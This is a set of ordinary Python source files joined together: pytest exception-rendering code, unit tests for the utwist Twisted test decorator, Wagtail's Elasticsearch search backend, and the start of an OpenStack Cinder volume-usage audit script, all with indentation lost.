return ReprExceptionInfo(reprtraceback, reprcrash)
else:
repr_chain = []
e = excinfo.value
descr = None
while e is not None:
if excinfo:
reprtraceback = self.repr_traceback(excinfo)
reprcrash = excinfo._getreprcrash()
else:
# fallback to native repr if the exception doesn't have a traceback:
# ExceptionInfo objects require a full traceback to work
reprtraceback = ReprTracebackNative(traceback.format_exception(type(e), e, None))
reprcrash = None
repr_chain += [(reprtraceback, reprcrash, descr)]
if e.__cause__ is not None:
e = e.__cause__
excinfo = ExceptionInfo((type(e), e, e.__traceback__)) if e.__traceback__ else None
descr = 'The above exception was the direct cause of the following exception:'
elif (e.__context__ is not None and not e.__suppress_context__):
e = e.__context__
excinfo = ExceptionInfo((type(e), e, e.__traceback__)) if e.__traceback__ else None
descr = 'During handling of the above exception, another exception occurred:'
else:
e = None
repr_chain.reverse()
return ExceptionChainRepr(repr_chain)
class TerminalRepr(object):
def __str__(self):
s = self.__unicode__()
if _PY2:
s = s.encode('utf-8')
return s
def __unicode__(self):
# FYI this is called from pytest-xdist's serialization of exception
# information.
io = py.io.TextIO()
tw = py.io.TerminalWriter(file=io)
self.toterminal(tw)
return io.getvalue().strip()
def __repr__(self):
return "<%s instance at %0x>" % (self.__class__, id(self))
class ExceptionRepr(TerminalRepr):
def __init__(self):
self.sections = []
def addsection(self, name, content, sep="-"):
self.sections.append((name, content, sep))
def toterminal(self, tw):
for name, content, sep in self.sections:
tw.sep(sep, name)
tw.line(content)
class ExceptionChainRepr(ExceptionRepr):
def __init__(self, chain):
super(ExceptionChainRepr, self).__init__()
self.chain = chain
# reprcrash and reprtraceback of the outermost (the newest) exception
# in the chain
self.reprtraceback = chain[-1][0]
self.reprcrash = chain[-1][1]
def toterminal(self, tw):
for element in self.chain:
element[0].toterminal(tw)
if element[2] is not None:
tw.line("")
tw.line(element[2], yellow=True)
super(ExceptionChainRepr, self).toterminal(tw)
class ReprExceptionInfo(ExceptionRepr):
def __init__(self, reprtraceback, reprcrash):
super(ReprExceptionInfo, self).__init__()
self.reprtraceback = reprtraceback
self.reprcrash = reprcrash
def toterminal(self, tw):
self.reprtraceback.toterminal(tw)
super(ReprExceptionInfo, self).toterminal(tw)
class ReprTraceback(TerminalRepr):
entrysep = "_ "
def __init__(self, reprentries, extraline, style):
self.reprentries = reprentries
self.extraline = extraline
self.style = style
def toterminal(self, tw):
# the entries might have different styles
for i, entry in enumerate(self.reprentries):
if entry.style == "long":
tw.line("")
entry.toterminal(tw)
if i < len(self.reprentries) - 1:
next_entry = self.reprentries[i + 1]
if entry.style == "long" or \
entry.style == "short" and next_entry.style == "long":
tw.sep(self.entrysep)
if self.extraline:
tw.line(self.extraline)
class ReprTracebackNative(ReprTraceback):
def __init__(self, tblines):
self.style = "native"
self.reprentries = [ReprEntryNative(tblines)]
self.extraline = None
class ReprEntryNative(TerminalRepr):
style = "native"
def __init__(self, tblines):
self.lines = tblines
def toterminal(self, tw):
tw.write("".join(self.lines))
class ReprEntry(TerminalRepr):
localssep = "_ "
def __init__(self, lines, reprfuncargs, reprlocals, filelocrepr, style):
self.lines = lines
self.reprfuncargs = reprfuncargs
self.reprlocals = reprlocals
self.reprfileloc = filelocrepr
self.style = style
def toterminal(self, tw):
if self.style == "short":
self.reprfileloc.toterminal(tw)
for line in self.lines:
red = line.startswith("E ")
tw.line(line, bold=True, red=red)
# tw.line("")
return
if self.reprfuncargs:
self.reprfuncargs.toterminal(tw)
for line in self.lines:
red = line.startswith("E ")
tw.line(line, bold=True, red=red)
if self.reprlocals:
# tw.sep(self.localssep, "Locals")
tw.line("")
self.reprlocals.toterminal(tw)
if self.reprfileloc:
if self.lines:
tw.line("")
self.reprfileloc.toterminal(tw)
def __str__(self):
return "%s\n%s\n%s" % ("\n".join(self.lines),
self.reprlocals,
self.reprfileloc)
class ReprFileLocation(TerminalRepr):
def __init__(self, path, lineno, message):
self.path = str(path)
self.lineno = lineno
self.message = message
def toterminal(self, tw):
# filename and lineno output for each entry,
# using an output format that most editors unterstand
msg = self.message
i = msg.find("\n")
if i != -1:
msg = msg[:i]
tw.write(self.path, bold=True, red=True)
tw.line(":%s: %s" % (self.lineno, msg))
class ReprLocals(TerminalRepr):
def __init__(self, lines):
self.lines = lines
def toterminal(self, tw):
for line in self.lines:
tw.line(line)
class ReprFuncArgs(TerminalRepr):
def __init__(self, args):
self.args = args
def toterminal(self, tw):
if self.args:
linesofar = ""
for name, value in self.args:
ns = "%s = %s" % (safe_str(name), safe_str(value))
if len(ns) + len(linesofar) + 2 > tw.fullwidth:
if linesofar:
tw.line(linesofar)
linesofar = ns
else:
if linesofar:
linesofar += ", " + ns
else:
linesofar = ns
if linesofar:
tw.line(linesofar)
tw.line("")
def getrawcode(obj, trycall=True):
""" return code object for given function. """
try:
return obj.__code__
except AttributeError:
obj = getattr(obj, 'im_func', obj)
obj = getattr(obj, 'func_code', obj)
obj = getattr(obj, 'f_code', obj)
obj = getattr(obj, '__code__', obj)
if trycall and not hasattr(obj, 'co_firstlineno'):
if hasattr(obj, '__call__') and not inspect.isclass(obj):
x = getrawcode(obj.__call__, trycall=False)
if hasattr(x, 'co_firstlineno'):
return x
return obj
if PY35: # RecursionError introduced in 3.5
def is_recursion_error(excinfo):
return excinfo.errisinstance(RecursionError) # noqa
else:
def is_recursion_error(excinfo):
if not excinfo.errisinstance(RuntimeError):
return False
try:
return "maximum recursion depth exceeded" in str(excinfo.value)
except UnicodeError:
return False
|
|
# Copyright (c) 2014 Stefan C. Mueller
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import unittest
import sys
from twisted.internet import defer
from twisted.internet import protocol, reactor, task
from twisted.python.failure import Failure
from twisted.trial.util import DirtyReactorAggregateError
from twisted.internet.protocol import ClientFactory
from twisted.internet.endpoints import TCP4ServerEndpoint, TCP4ClientEndpoint
from utwist import with_reactor
from twisted.internet.defer import CancelledError
class TestUTwist(unittest.TestCase):
"""
Unit-tests for the :func:`utwist.twisted_test` decorator.
"""
def test_forwards_exceptions(self):
"""
Checks that test errors are passed through.
"""
@with_reactor
def test():
raise ValueError()
self.assertRaises(ValueError, test)
def test_fowards_returnvalue(self):
"""
Checks that return values are passed through (although
this is probably not used in most test frameworks).
"""
@with_reactor
def test():
return 42
self.assertEqual(42, test())
def test_reactor_running(self):
"""
Reactor should be running. Not a very strong test,
since the reactor is started on the first test only,
but we can check anyways.
"""
@with_reactor
def test():
self.assertTrue(reactor.running)
test()
def test_timeout(self):
"""
Checks that timeout causes a test to fail.
Also checks that the default timeout can be overwritten.
"""
@with_reactor(timeout=0.01)
def test():
def nop():
return
return task.deferLater(reactor, 1, nop)
self.assertRaises(CancelledError, test)
def test_no_timeout(self):
"""
Checks that a timeout of zero, is not interpreted
literally.
"""
@with_reactor(timeout=0)
def test():
def nop():
return
return task.deferLater(reactor, 0.1, nop)
test()
def test_deferred_success(self):
"""
Checks that we can return a value via a deferred.
"""
@with_reactor
def test():
return defer.succeed(42)
self.assertEqual(42, test())
def test_deferred_failure(self):
"""
Checks that we can fail a test by returning
a failure via a deferred.
"""
@with_reactor
def test():
return defer.fail(Failure(ValueError()))
self.assertRaises(ValueError, test)
def test_failure(self):
"""
Checks that we can fail a test by returing
a failure directly.
"""
@with_reactor
def test():
return Failure(ValueError())
self.assertRaises(ValueError, test)
def test_pending_call(self):
"""
Checks that leftover pending calls result in a dirty-reactor
failure.
"""
@with_reactor
def test():
def later():
pass
reactor.callLater(1, later)
self.assertRaises(DirtyReactorAggregateError, test)
def test_setup_called(self):
"""
Checks that `twisted_setup()` is called before the test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_setup(self):
self.called = True
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertTrue(case.test())
def test_teardown_called(self):
"""
Checks that `twisted_teardown()` is called after the test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
self.called = True
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertFalse(case.test())
self.assertTrue(case.called)
def test_teardown_after_failure(self):
"""
Checks that `twisted_teardown()` is called even if the
test failed.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
self.called = True
@with_reactor
def test(self):
raise ValueError()
case = TestClass()
self.assertRaises(ValueError, case.test)
self.assertTrue(case.called)
def test_teardown_fails_after_failure(self):
"""
If the test fails and the teardown fails, the
failure of the test must be reported.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
raise TypeError()
@with_reactor
def test(self):
raise ValueError()
case = TestClass()
self.assertRaises(ValueError, case.test)
def test_setup_delegate(self):
"""
Check that if setup returns a deferred
that we wait til it has completed before running
the test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_setup(self):
def later():
self.called = True
return task.deferLater(reactor, 0.01, later)
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertTrue(case.test())
def test_teardown_delegate(self):
"""
Check that if teardown returns a deferred
that we wait til for it before finishing the
test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
def later():
self.called = True
return task.deferLater(reactor, 0.01, later)
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertFalse(case.test())
self.assertTrue(case.called)
def test_spawnProcess(self):
"""
Integration test.
Checks that we can start a process and detect when it exits.
If this test fails with a timeout, then there is very likely
something broken with the interrupt handing.
"""
class DummyProcessProtocol(protocol.ProcessProtocol):
def processEnded(self, status):
process_end.callback(None)
@with_reactor
def test():
reactor.spawnProcess(DummyProcessProtocol(), sys.executable, ['python', '-c', 'print "hello"'])
return process_end
process_end = defer.Deferred()
test()
def test_tcp_echo(self):
"""
Integration test.
Checks if we can open a TCP port, connect to it, send data in both
directions, and close both connection and port.
"""
@with_reactor
def test():
class Echo(protocol.Protocol):
def dataReceived(self, data):
self.transport.write(data)
class SayX(protocol.Protocol):
def __init__(self):
self.data_deferred = defer.Deferred()
def connectionMade(self):
self.transport.write("X")
def dataReceived(self, data):
self.transport.loseConnection()
self.data_deferred.callback(data)
def open_port():
echo_factory = ClientFactory()
echo_factory.protocol = Echo
endpoint = TCP4ServerEndpoint(reactor, 0, interface='127.0.0.1')
d = endpoint.listen(echo_factory)
d.addCallback(port_open)
return d
def port_open(listening_port):
port = listening_port.getHost().port
return connect(port, listening_port)
def connect(port, listening_port):
sayx_factory = ClientFactory()
sayx_factory.protocol = SayX
endpoint = TCP4ClientEndpoint(reactor, '127.0.0.1', port)
d = endpoint.connect(sayx_factory)
d.addCallback(connected, listening_port)
return d
def connected(sayx_protocol, listening_port):
d = sayx_protocol.data_deferred
d.addCallback(disconnected, listening_port)
return d
def disconnected(data, listening_port):
self.assertEqual("X", data)
return listening_port. stopListening()
return open_port()
test()
|
|
from __future__ import absolute_import, unicode_literals
import json
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.crypto import get_random_string
from django.utils.six.moves.urllib.parse import urlparse
from elasticsearch import Elasticsearch, NotFoundError
from elasticsearch.helpers import bulk
from wagtail.wagtailsearch.index import (
FilterField, Indexed, RelatedFields, SearchField, class_is_indexed)
from .base import BaseSearchBackend, BaseSearchQuery, BaseSearchResults
class ElasticsearchMapping(object):
type_map = {
'AutoField': 'integer',
'BinaryField': 'binary',
'BooleanField': 'boolean',
'CharField': 'string',
'CommaSeparatedIntegerField': 'string',
'DateField': 'date',
'DateTimeField': 'date',
'DecimalField': 'double',
'FileField': 'string',
'FilePathField': 'string',
'FloatField': 'double',
'IntegerField': 'integer',
'BigIntegerField': 'long',
'IPAddressField': 'string',
'GenericIPAddressField': 'string',
'NullBooleanField': 'boolean',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer',
'PositiveSmallIntegerField': 'integer',
'SlugField': 'string',
'SmallIntegerField': 'integer',
'TextField': 'string',
'TimeField': 'date',
}
# Contains the configuration required to use the edgengram_analyzer
# on a field. It's different in Elasticsearch 2 so it's been put in
# an attribute here to make it easier to override in a subclass.
edgengram_analyzer_config = {
'index_analyzer': 'edgengram_analyzer',
}
def __init__(self, model):
self.model = model
def get_parent(self):
for base in self.model.__bases__:
if issubclass(base, Indexed) and issubclass(base, models.Model):
return type(self)(base)
def get_document_type(self):
return self.model.indexed_get_content_type()
def get_field_column_name(self, field):
if isinstance(field, FilterField):
return field.get_attname(self.model) + '_filter'
elif isinstance(field, SearchField):
return field.get_attname(self.model)
elif isinstance(field, RelatedFields):
return field.field_name
def get_field_mapping(self, field):
if isinstance(field, RelatedFields):
mapping = {'type': 'nested', 'properties': {}}
nested_model = field.get_field(self.model).related_model
nested_mapping = type(self)(nested_model)
for sub_field in field.fields:
sub_field_name, sub_field_mapping = nested_mapping.get_field_mapping(sub_field)
mapping['properties'][sub_field_name] = sub_field_mapping
return self.get_field_column_name(field), mapping
else:
mapping = {'type': self.type_map.get(field.get_type(self.model), 'string')}
if isinstance(field, SearchField):
if field.boost:
mapping['boost'] = field.boost
if field.partial_match:
mapping.update(self.edgengram_analyzer_config)
mapping['include_in_all'] = True
elif isinstance(field, FilterField):
mapping['index'] = 'not_analyzed'
mapping['include_in_all'] = False
if 'es_extra' in field.kwargs:
for key, value in field.kwargs['es_extra'].items():
mapping[key] = value
return self.get_field_column_name(field), mapping
def get_mapping(self):
# Make field list
fields = {
'pk': dict(type='string', index='not_analyzed', store='yes', include_in_all=False),
'content_type': dict(type='string', index='not_analyzed', include_in_all=False),
'_partials': dict(type='string', include_in_all=False),
}
fields['_partials'].update(self.edgengram_analyzer_config)
fields.update(dict(
self.get_field_mapping(field) for field in self.model.get_search_fields()
))
return {
self.get_document_type(): {
'properties': fields,
}
}
def get_document_id(self, obj):
return obj.indexed_get_toplevel_content_type() + ':' + str(obj.pk)
def _get_nested_document(self, fields, obj):
doc = {}
partials = []
model = type(obj)
mapping = type(self)(model)
for field in fields:
value = field.get_value(obj)
doc[mapping.get_field_column_name(field)] = value
# Check if this field should be added into _partials
if isinstance(field, SearchField) and field.partial_match:
partials.append(value)
return doc, partials
def get_document(self, obj):
# Build document
doc = dict(pk=str(obj.pk), content_type=self.model.indexed_get_content_type())
partials = []
for field in self.model.get_search_fields():
value = field.get_value(obj)
if isinstance(field, RelatedFields):
if isinstance(value, models.Manager):
nested_docs = []
for nested_obj in value.all():
nested_doc, extra_partials = self._get_nested_document(field.fields, nested_obj)
nested_docs.append(nested_doc)
partials.extend(extra_partials)
value = nested_docs
elif isinstance(value, models.Model):
value, extra_partials = self._get_nested_document(field.fields, value)
partials.extend(extra_partials)
doc[self.get_field_column_name(field)] = value
# Check if this field should be added into _partials
if isinstance(field, SearchField) and field.partial_match:
partials.append(value)
# Add partials to document
doc['_partials'] = partials
return doc
def __repr__(self):
return '<ElasticsearchMapping: {}>'.format(self.model.__name__)
class ElasticsearchSearchQuery(BaseSearchQuery):
mapping_class = ElasticsearchMapping
DEFAULT_OPERATOR = 'or'
def __init__(self, *args, **kwargs):
super(ElasticsearchSearchQuery, self).__init__(*args, **kwargs)
self.mapping = self.mapping_class(self.queryset.model)
# Convert field names into index column names
if self.fields:
fields = []
searchable_fields = {f.field_name: f for f in self.queryset.model.get_searchable_search_fields()}
for field_name in self.fields:
if field_name in searchable_fields:
field_name = self.mapping.get_field_column_name(searchable_fields[field_name])
fields.append(field_name)
self.fields = fields
def _process_lookup(self, field, lookup, value):
column_name = self.mapping.get_field_column_name(field)
if lookup == 'exact':
if value is None:
return {
'missing': {
'field': column_name,
}
}
else:
return {
'term': {
column_name: value,
}
}
if lookup == 'isnull':
if value:
return {
'missing': {
'field': column_name,
}
}
else:
return {
'not': {
'missing': {
'field': column_name,
}
}
}
if lookup in ['startswith', 'prefix']:
return {
'prefix': {
column_name: value,
}
}
if lookup in ['gt', 'gte', 'lt', 'lte']:
return {
'range': {
column_name: {
lookup: value,
}
}
}
if lookup == 'range':
lower, upper = value
return {
'range': {
column_name: {
'gte': lower,
'lte': upper,
}
}
}
if lookup == 'in':
return {
'terms': {
column_name: list(value),
}
}
def _connect_filters(self, filters, connector, negated):
if filters:
if len(filters) == 1:
filter_out = filters[0]
else:
filter_out = {
connector.lower(): [
fil for fil in filters if fil is not None
]
}
if negated:
filter_out = {
'not': filter_out
}
return filter_out
def get_inner_query(self):
if self.query_string is not None:
fields = self.fields or ['_all', '_partials']
if len(fields) == 1:
if self.operator == 'or':
query = {
'match': {
fields[0]: self.query_string,
}
}
else:
query = {
'match': {
fields[0]: {
'query': self.query_string,
'operator': self.operator,
}
}
}
else:
query = {
'multi_match': {
'query': self.query_string,
'fields': fields,
}
}
if self.operator != 'or':
query['multi_match']['operator'] = self.operator
else:
query = {
'match_all': {}
}
return query
def get_content_type_filter(self):
return {
'prefix': {
'content_type': self.queryset.model.indexed_get_content_type()
}
}
def get_filters(self):
filters = []
# Filter by content type
filters.append(self.get_content_type_filter())
# Apply filters from queryset
queryset_filters = self._get_filters_from_queryset()
if queryset_filters:
filters.append(queryset_filters)
return filters
def get_query(self):
inner_query = self.get_inner_query()
filters = self.get_filters()
if len(filters) == 1:
return {
'filtered': {
'query': inner_query,
'filter': filters[0],
}
}
elif len(filters) > 1:
return {
'filtered': {
'query': inner_query,
'filter': {
'and': filters,
}
}
}
else:
return inner_query
def get_sort(self):
# Ordering by relevance is the default in Elasticsearch
if self.order_by_relevance:
return
# Get queryset and make sure its ordered
if self.queryset.ordered:
order_by_fields = self.queryset.query.order_by
sort = []
for order_by_field in order_by_fields:
reverse = False
field_name = order_by_field
if order_by_field.startswith('-'):
reverse = True
field_name = order_by_field[1:]
field = self._get_filterable_field(field_name)
column_name = self.mapping.get_field_column_name(field)
sort.append({
column_name: 'desc' if reverse else 'asc'
})
return sort
else:
# Order by pk field
return ['pk']
def __repr__(self):
return json.dumps(self.get_query())
class ElasticsearchSearchResults(BaseSearchResults):
def __init__(self, *args, **kwargs):
super(ElasticsearchSearchResults, self).__init__(*args, **kwargs)
self.highlight_params = {}
def highlight(self, **kwargs):
# It's possible to pass list of dicts and dict as the fields param
fields = kwargs.get('fields', [])
if isinstance(fields, dict):
fields = [{k: v} for k, v in fields.items()]
post_processed_fields = {}
for field_def in fields:
field_name = field_def.keys()[0] if isinstance(field_def, dict) and len(field_def) else None
if field_name:
# Use wildcard column name on request. This allows us to query against all content types.
# Alternative solution: get all indexed models and add all possible column names into request.
field_column_name = '*{}'.format(field_name)
post_processed_field_def = {
field_column_name: field_def[field_name]
}
post_processed_fields[field_name] = post_processed_field_def
self.highlight_params['fields'] = post_processed_fields
self.highlight_params['require_field_match'] = kwargs.get('require_field_match', None)
return self
def _clone(self):
new = super(ElasticsearchSearchResults, self)._clone()
new.highlight_params = self.highlight_params
return new
def _get_es_body(self, for_count=False):
body = {
'query': self.query.get_query()
}
if not for_count:
sort = self.query.get_sort()
if sort is not None:
body['sort'] = sort
# Add highlighting into a body, if fields are specified
if self.highlight_params.get('fields'):
highlight = {
'fields': self.highlight_params['fields'].values(),
}
if self.highlight_params['require_field_match'] is not None:
highlight.update({
'require_field_match': self.highlight_params['require_field_match'],
})
body['highlight'] = highlight
return body
def _get_content_type(self, content_type):
app_label, model = content_type.rsplit('_', 2)[-2:]
return ContentType.objects.get_by_natural_key(app_label, model)
def _do_search(self):
# Params for elasticsearch query
params = dict(
index=self.backend.get_index_for_model(self.query.queryset.model).name,
body=self._get_es_body(),
_source=False,
fields=['pk', 'content_type'],
from_=self.start,
)
# Add size if set
if self.stop is not None:
params['size'] = self.stop - self.start
# Send to Elasticsearch
hits = self.backend.es.search(**params)
pks = []
data_by_pk = {}
for hit in hits['hits']['hits']:
# Get pks from results
pk = hit['fields']['pk'][0]
pks.append(pk)
# Get content type
data_by_pk.setdefault(pk, {})
data_by_pk[pk]['content_type'] = self._get_content_type(hit['fields']['content_type'][0])
# Get highlight
data_by_pk[pk]['highlight'] = hit.get('highlight', {})
# Initialise results dictionary
results = dict((str(pk), None) for pk in pks)
# Find objects in database and add them to dict
queryset = self.query.queryset.filter(pk__in=pks)
for obj in queryset:
str_pk = str(obj.pk)
fields_to_highlight = self.highlight_params.get('fields', {}).keys()
if fields_to_highlight:
obj_model = data_by_pk[str_pk]['content_type'].model_class()
obj_mapping = self.backend.mapping_class(obj_model)
searchable_search_fields = {f.field_name: f for f in obj_model.get_searchable_search_fields()}
for field_name in fields_to_highlight:
highlighted_field = None
field = searchable_search_fields.get(field_name)
if field:
field_column_name = obj_mapping.get_field_column_name(field)
highlighted_field = data_by_pk[str_pk]['highlight'].get(field_column_name, [None])[0]
setattr(obj, '{}_highlight'.format(field_name), highlighted_field)
results[str_pk] = obj
# Return results in order given by Elasticsearch
return [results[str(pk)] for pk in pks if results[str(pk)]]
def _do_count(self):
# Get count
hit_count = self.backend.es.count(
index=self.backend.get_index_for_model(self.query.queryset.model).name,
body=self._get_es_body(for_count=True),
)['count']
# Add limits
hit_count -= self.start
if self.stop is not None:
hit_count = min(hit_count, self.stop - self.start)
return max(hit_count, 0)
class ElasticsearchIndex(object):
def __init__(self, backend, name):
self.backend = backend
self.es = backend.es
self.mapping_class = backend.mapping_class
self.name = name
def put(self):
self.es.indices.create(self.name, self.backend.settings)
def delete(self):
try:
self.es.indices.delete(self.name)
except NotFoundError:
pass
def exists(self):
return self.es.indices.exists(self.name)
def is_alias(self):
return self.es.indices.exists_alias(self.name)
def aliased_indices(self):
"""
If this index object represents an alias (which appear the same in the
Elasticsearch API), this method can be used to fetch the list of indices
the alias points to.
Use the is_alias method if you need to find out if this an alias. This
returns an empty list if called on an index.
"""
return [
self.backend.index_class(self.backend, index_name)
for index_name in self.es.indices.get_alias(name=self.name).keys()
]
def put_alias(self, name):
"""
Creates a new alias to this index. If the alias already exists it will
be repointed to this index.
"""
self.es.indices.put_alias(name=name, index=self.name)
def add_model(self, model):
# Get mapping
mapping = self.mapping_class(model)
# Put mapping
self.es.indices.put_mapping(
index=self.name, doc_type=mapping.get_document_type(), body=mapping.get_mapping()
)
def add_item(self, item):
# Make sure the object can be indexed
if not class_is_indexed(item.__class__):
return
# Get mapping
mapping = self.mapping_class(item.__class__)
# Add document to index
self.es.index(
self.name, mapping.get_document_type(), mapping.get_document(item), id=mapping.get_document_id(item)
)
def add_items(self, model, items):
if not class_is_indexed(model):
return
# Get mapping
mapping = self.mapping_class(model)
doc_type = mapping.get_document_type()
# Create list of actions
actions = []
for item in items:
# Create the action
action = {
'_index': self.name,
'_type': doc_type,
'_id': mapping.get_document_id(item),
}
action.update(mapping.get_document(item))
actions.append(action)
# Run the actions
bulk(self.es, actions)
def delete_item(self, item):
# Make sure the object can be indexed
if not class_is_indexed(item.__class__):
return
# Get mapping
mapping = self.mapping_class(item.__class__)
# Delete document
try:
self.es.delete(
self.name,
mapping.get_document_type(),
mapping.get_document_id(item),
)
except NotFoundError:
pass # Document doesn't exist, ignore this exception
def refresh(self):
self.es.indices.refresh(self.name)
def reset(self):
# Delete old index
self.delete()
# Create new index
self.put()
class ElasticsearchIndexRebuilder(object):
def __init__(self, index):
self.index = index
def reset_index(self):
self.index.reset()
def start(self):
# Reset the index
self.reset_index()
return self.index
def finish(self):
self.index.refresh()
class ElasticsearchAtomicIndexRebuilder(ElasticsearchIndexRebuilder):
def __init__(self, index):
self.alias = index
self.index = index.backend.index_class(
index.backend,
self.alias.name + '_' + get_random_string(7).lower()
)
def reset_index(self):
# Delete old index using the alias
# This should delete both the alias and the index
self.alias.delete()
# Create new index
self.index.put()
# Create a new alias
self.index.put_alias(self.alias.name)
def start(self):
# Create the new index
self.index.put()
return self.index
def finish(self):
self.index.refresh()
if self.alias.is_alias():
# Update existing alias, then delete the old index
# Find index that alias currently points to, we'll delete it after
# updating the alias
old_index = self.alias.aliased_indices()
# Update alias to point to new index
self.index.put_alias(self.alias.name)
# Delete old index
# aliased_indices() can return multiple indices. Delete them all
for index in old_index:
if index.name != self.index.name:
index.delete()
else:
# self.alias doesn't currently refer to an alias in Elasticsearch.
# This means that either nothing exists in ES with that name or
# there is currently an index with the that name
# Run delete on the alias, just in case it is currently an index.
# This happens on the first rebuild after switching ATOMIC_REBUILD on
self.alias.delete()
# Create the alias
self.index.put_alias(self.alias.name)
class ElasticsearchSearchBackend(BaseSearchBackend):
index_class = ElasticsearchIndex
query_class = ElasticsearchSearchQuery
results_class = ElasticsearchSearchResults
mapping_class = ElasticsearchMapping
basic_rebuilder_class = ElasticsearchIndexRebuilder
atomic_rebuilder_class = ElasticsearchAtomicIndexRebuilder
settings = {
'settings': {
'analysis': {
'analyzer': {
'ngram_analyzer': {
'type': 'custom',
'tokenizer': 'lowercase',
'filter': ['asciifolding', 'ngram']
},
'edgengram_analyzer': {
'type': 'custom',
'tokenizer': 'lowercase',
'filter': ['asciifolding', 'edgengram']
}
},
'tokenizer': {
'ngram_tokenizer': {
'type': 'nGram',
'min_gram': 3,
'max_gram': 15,
},
'edgengram_tokenizer': {
'type': 'edgeNGram',
'min_gram': 2,
'max_gram': 15,
'side': 'front'
}
},
'filter': {
'ngram': {
'type': 'nGram',
'min_gram': 3,
'max_gram': 15
},
'edgengram': {
'type': 'edgeNGram',
'min_gram': 1,
'max_gram': 15
}
}
}
}
}
def __init__(self, params):
super(ElasticsearchSearchBackend, self).__init__(params)
# Get settings
self.hosts = params.pop('HOSTS', None)
self.index_name = params.pop('INDEX', 'wagtail')
self.timeout = params.pop('TIMEOUT', 10)
if params.pop('ATOMIC_REBUILD', False):
self.rebuilder_class = self.atomic_rebuilder_class
else:
self.rebuilder_class = self.basic_rebuilder_class
# If HOSTS is not set, convert URLS setting to HOSTS
es_urls = params.pop('URLS', ['http://localhost:9200'])
if self.hosts is None:
self.hosts = []
for url in es_urls:
parsed_url = urlparse(url)
use_ssl = parsed_url.scheme == 'https'
port = parsed_url.port or (443 if use_ssl else 80)
http_auth = None
if parsed_url.username is not None and parsed_url.password is not None:
http_auth = (parsed_url.username, parsed_url.password)
self.hosts.append({
'host': parsed_url.hostname,
'port': port,
'url_prefix': parsed_url.path,
'use_ssl': use_ssl,
'verify_certs': use_ssl,
'http_auth': http_auth,
})
# Get Elasticsearch interface
# Any remaining params are passed into the Elasticsearch constructor
self.es = Elasticsearch(
hosts=self.hosts,
timeout=self.timeout,
**params)
def get_index_for_model(self, model):
return self.index_class(self, self.index_name)
def get_index(self):
return self.index_class(self, self.index_name)
def get_rebuilder(self):
return self.rebuilder_class(self.get_index())
def reset_index(self):
# Use the rebuilder to reset the index
self.get_rebuilder().reset_index()
def add_type(self, model):
self.get_index_for_model(model).add_model(model)
def refresh_index(self):
self.get_index().refresh()
def add(self, obj):
self.get_index_for_model(type(obj)).add_item(obj)
def add_bulk(self, model, obj_list):
self.get_index_for_model(model).add_items(model, obj_list)
def delete(self, obj):
self.get_index_for_model(type(obj)).delete_item(obj)
SearchBackend = ElasticsearchSearchBackend
|
|
#!/usr/bin/env python
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Cron script to generate usage notifications for volumes existing during
the audit period.
Together with the notifications generated by volumes
create/delete/resize, over that time period, this allows an external
system consuming usage notification feeds to calculate volume usage
for each tenant.
Time periods are specified as 'hour', 'month', 'day' or 'year'
hour = previous hour. If run at 9:07am, will generate usage for 8-9am.
month = previous month. If the script is run April 1, it will generate
usages for March 1 through March 31.
day = previous day. if run on July 4th, it generates usages for July 3rd.
year = previous year. If run on Jan 1, it generates usages for
Jan 1 through Dec 31 of the previous year.
"""
from __future__ import print_function
import datetime
import sys
import warnings
warnings.simplefilter('once', DeprecationWarning)
from oslo_config import cfg
from oslo_log import log as logging
from cinder import i18n
i18n.enable_lazy()
from cinder import context
from cinder import db
from cinder.i18n import _, _LE
from cinder import objects
from cinder import rpc
from cinder import utils
from cinder import version
import cinder.volume.utils
CONF = cfg.CONF
script_opts = [
cfg.StrOpt('start_time',
default=None,
help="If this option is specified then the start time "
"specified is used instead of the start time of the "
"last completed audit period."),
cfg.StrOpt('end_time',
default=None,
help="If this option is specified then the end time "
"specified is used instead of the end time of the "
"last completed audit period."),
cfg.BoolOpt('send_actions',
default=False,
help="Send the volume and snapshot create and delete "
"notifications generated in the specified period."),
]
CONF.register_cli_opts(script_opts)
def main():
admin_context = context.get_admin_context()
CONF(sys.argv[1:], project='cinder',
version=version.version_string())
logging.setup(CONF, "cinder")
LOG = logging.getLogger("cinder")
rpc.init(CONF)
begin, end = utils.last_completed_audit_period()
if CONF.start_time:
begin = datetime.datetime.strptime(CONF.start_time,
"%Y-%m-%d %H:%M:%S")
if CONF.end_time:
